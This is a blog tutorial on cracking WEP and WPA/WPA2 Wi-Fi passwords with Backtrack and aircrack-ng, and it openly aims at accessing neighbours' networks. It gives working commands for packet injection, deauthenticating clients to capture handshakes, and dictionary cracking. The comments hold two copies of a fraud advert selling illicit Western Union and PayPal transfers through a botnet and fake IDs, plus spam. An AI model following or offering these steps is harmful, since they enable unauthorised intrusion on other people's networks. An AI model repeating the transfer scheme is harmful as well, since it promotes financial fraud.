Friday, August 3, 2012

How to hack WiFi WEP WPA WPA2

[Image: 8Ifdn.jpg]


[Image: ePfVI.jpg]
 Welcome to my tutorial about wireless networking. Today I'll be shwoing you how easy it is to get access to a wireless secure network. There are lots of questions coming from the beginners on how to crack WEP/WPA/WPA2 keys and accessing their neighbor's connection. The purpose of this tutorial is to answer them. Judging from the "tutorials" on youtube which are either outdated, or just misguiding the viewers, this tutorial will be unalike. I will be covering all of the parts and ways of hacking a network and gaining access to their router. This tutorial will be separated in 2 parts,  as WEP and WPA/WPA2 hacking. Please read below on what you need to be successful.


[Image: FjkSQ.jpg]
    • Backtrack 5 - I would suggest GNOME, 32Bit, ISO & Direct
    • Compatible Wireless Card
    • WPA Word List - Search via torrents to find one


[Image: V5vKq.jpg]
  • Making a bootable USB
  • WEP encrypted networks
  • WPA/WPA2 encrypted networks
  • Commands Used








[Image: hPqWA.jpg]
    This is the most important step that you need to succeed in before learning how to use backtrack and actually hack WEP/WPA networks. Please follow the easy steps below:
[Image: hLpNX.jpg]
    • Download & Run UNetbootin
    • Tick Diskimage instead of Distribution
    • Select USB Drive as the type, and select your USB drive name - Example: F:\
    • Click OK and wait a couple of minutes - Note: It may freeze at some point, don't worry about that








[Image: T1lHe.jpg]
    What you need for this crack are a few simple things, a copy of backtrack 5 booting off a DVD or a flash drive and a compatible wireless card that supports packet injection. Now if you can't get to this screen, and you are stuck at the terminal you get when booting into backtrack, you need to type startx and wait a couple of minutes for the desktop to show. Okay so let's begin, so first we need to open a terminal. To do that, just click the little icon that's on the right side from System. Please see the image below:

    [Image: eYmZR.jpg?2367]

    Now type airmon-ng and that command displays our interfaces. In my case I have wlan0, and now we are going to put it into monitor mode. To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.

    [Image: KjZHU.jpg]

    Type airodump-ng mon0 and that will start scanning for wi-fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID the DATA, the CHANNEL and the type of ENCRYPTION. Please refer to the image below, if you have any trouble getting to that point.

    [Image: WNi8O.jpg]

    Now we are going to set it to lock on a specific network named SKIDHACKER. To do that, type airodump-ng -c (channel) -w WEPcrack --bssid (bssid of the network) mon0. Replace (channel) with the channel of the network you are trying to crack, and replace (bssid of the network) with the bssid of the network you want to crack.

    [Image: n3XFy.jpg]

    Okay so as you can probably see the data is going really slow, and we need to boost that up. We are going to need a lot more data, so let's preform one of the aireplay commands that will boost that data. Firstly, open up a new terminal and type aireplay-ng -1 0 -a (bsisd) mon0 where (bssid) is the bssid of the network. Now if your wi-fi card is supported, you should see Association successful :-), if you don't see that then your card is not supported.

    [Image: GknZt.jpg]

    Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. And now when the question Use this packet ? pops up, just push the letter y. And now as you can see in the image below, the data went high drastically.

    [Image: I3GcE.jpg]

    Okay so now lets open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data before trying to crack it. So let's type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don't forget to add that asterisk after the file and the extension which is .cap.

    [Image: 7Dno8.jpg]

    And now it will attempt to crack the password. Just wait a couple of minutes for it to complete, and once it did it will say KEY FOUND! [ XX:XX:XX:XX:XX ] where the X's will be random numbers and/or letters. That's not it, now to connect you will need to remove the semicolumns. For an example, if we were to have 12:34:52:66:59, the password would be 1232526659. Just log in to your Windows OS, and connect using that password.






[Image: p79vw.jpg]
    So lets begin. What you will need for this crack is a dictionary file that we are going to use to crack the WPA/WPA2 password. Remember, the bigger the dictionary file is the greater the chance you have in cracking the password. So now you are probably wondering, where do I get a dictionary file? Well, I don't know if this is allowed or not but I recently downloaded a 1.9GB dictionary file.

    To get the file please PM me, I can't risk getting this tutorial taken down. Okay, so firstly open up a terminal and once we have the terminal open we are going to type in airmon-ng which will display our wireless interfaces. In my case I have wlan0, and now we are going to put it into monitor mode. To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.
    [Image: KjZHU.jpg]

    Lets type in
    airodump-ng mon0 and this command is going to initiate the scanning process for Wi-Fi networks. As you can see in the picture below, a few WPA encrypted networks should pop up. I'm going to attempt to crack the network under the essid SKIDHАCKER. Take a note of the channel, and you want to copy the BSSID for later use.
    [Image: 5KSfa.jpg]

    Now we are going to type in
    airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0, and replace the values to fit what you got from the last step. Don't forget to remember what filename you chose, because we are going to need that at the end.
    [Image: 7jSkY.jpg]

    What is needed to crack a WPA or WPA2 key is something called a
    WPA Handshake. You can obtain a handshake by kicking someone off the network, and those computers will automatically reconnect which will give you the handshake. This means, if there is no one on the network, you can't get a handshake, and you can't crack the WPA network. So how do we know if someone is connected? Well look at the lower part of the airodump command, and you will notice something as STATION, and underneath that if someone is connected it wil show you their mac address.
    [Image: zoOBy.jpg]

    Once you get a handshake, airodump will alert you in the top screen, and the handshake will be located right from the time stamp. Okay, so lets open up a new terminal and we are going to kick off the computers connected. Lets type in
    aireplay-ng -1 0 -a (bssid) mon0. replace bssid with the network you are trying to crack and hit enter. It is going to attempt to kick off a client, and if it succeeds you will see the wpa handshake at the top right corner, if you don't run the aireplay command a couple of times.
    [Image: 3UU1B.jpg]

    So now that we have a wpa handshake file, we are going to attempt to crack it. Lets stop the scan by pressing
    CONTROL + C on the terminal where airodump is running. Now in order to find the handshake file, you need to go in the top menu and chose Places > Home Folder. Okay, so lets open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename). Where filename is the filename you specified when capturing the wpa handshake and the dictionary is the path of the wordlist you downloaded. This can be done by dragging in the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will parse in it's directory. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is the bigger are the chances of you getting the password.
    [Image: rpUMB.jpg]

    If the password is in the wordlist, it will give you a success message and the key in brackets. Happy hacking, hackers!




[Image: Zphi1.jpg]
  • airmon-ng
      This command displays the wireless interfaces.
  • airmon-ng start wlan0
      This command starts monitoring mode on a wi-fi device.
  • airodump-ng mon0
      This command shows all of the wi-fi networks online.
  • airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0
      This command specifies the wi-fi device to concentrate to one network.
  • aireplay-ng -1 0 -a (bssid) mon0
      This command kicks off clients that are connected, and gets the handshake.
  • aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
      This command boosts the data, when cracking WEP.
  • aircrack-ng -w (dictionary) (wpa handshake)
      This command is used when cracking WPA or WPA2 networks.
  • aircrack-ng (filename)*.cap
      This command is used when cracking WEP networks.


These were the commands I used in the whole guide.

4 comments:

  1. Hi,

    thanks for the tutorial. I have some questions:

    1. You say: "compatible wireless card that supports packet injection" How do I check it if my laptop has such a card?
    If not then what should I do?

    2. Backtrack is not supported any more and they refer to https://www.kali.org/. Is kali having the same utilities on it?

    ReplyDelete
    Replies
    1. I'm selling Western Union , Bank and Paypal Transfers all over the world. I'm getting much stuff through emails but also have a big experience in botnets etc. I've got 5 western union main computers data with the help of a strong botnet. Now I can change the info of a WU MTCN and can redirect any payment on any name. Simply I change the receiver name and country and payment goes to that person to whom i want to send. If anyone want to make big and instant money than contact me for deal.
      Info needed for WU Transfers :-

      1: First Name
      2: Last Name
      3: City
      4: Country

      Price List For WU Transfer:

      $1500 Transfer = $150 Charges
      $2000 Transfer = $300
      $3500 Transfer = $450
      $4500 Transfer = $500
      $5500 Transfer = $600

      Terms & Conditions :

      A person can take transfer once in a week and maximum 2 times in a month .

      If anyone want to do regular business with me then you must have many bank accounts,paypal,money bookers and fake ids for western union because after 2 or 3 transfers your paypal and Wu ids can be black listed or banned. So think before deal. Make big transactions and get a side and give other peoples chance or try to gather many fake accounts and work with me on regular basis.

      You can Contact us 24/7

      Contact us for deal : Email – Westernunionofficial.service@gmail.com

      Delete
  2. I'm selling Western Union , Bank and Paypal Transfers all over the world. I'm getting much stuff through emails but also have a big experience in botnets etc. I've got 5 western union main computers data with the help of a strong botnet. Now I can change the info of a WU MTCN and can redirect any payment on any name. Simply I change the receiver name and country and payment goes to that person to whom i want to send. If anyone want to make big and instant money than contact me for deal.
    Info needed for WU Transfers :-

    1: First Name
    2: Last Name
    3: City
    4: Country

    Price List For WU Transfer:

    $1500 Transfer = $150 Charges
    $2000 Transfer = $300
    $3500 Transfer = $450
    $4500 Transfer = $500
    $5500 Transfer = $600

    Terms & Conditions :

    A person can take transfer once in a week and maximum 2 times in a month .

    If anyone want to do regular business with me then you must have many bank accounts,paypal,money bookers and fake ids for western union because after 2 or 3 transfers your paypal and Wu ids can be black listed or banned. So think before deal. Make big transactions and get a side and give other peoples chance or try to gather many fake accounts and work with me on regular basis.

    You can Contact us 24/7

    Contact us for deal : Email – Westernunionofficial.service@gmail.com

    ReplyDelete
  3. Gambling addiction can cause serious harm to the casino - Dr.MCD
    Gambling addiction can 화성 출장마사지 cause serious harm to the casino. The 아산 출장샵 risks 논산 출장마사지 of problem gambling 파주 출장안마 in general 부천 출장안마 have increased over time and increase over time,

    ReplyDelete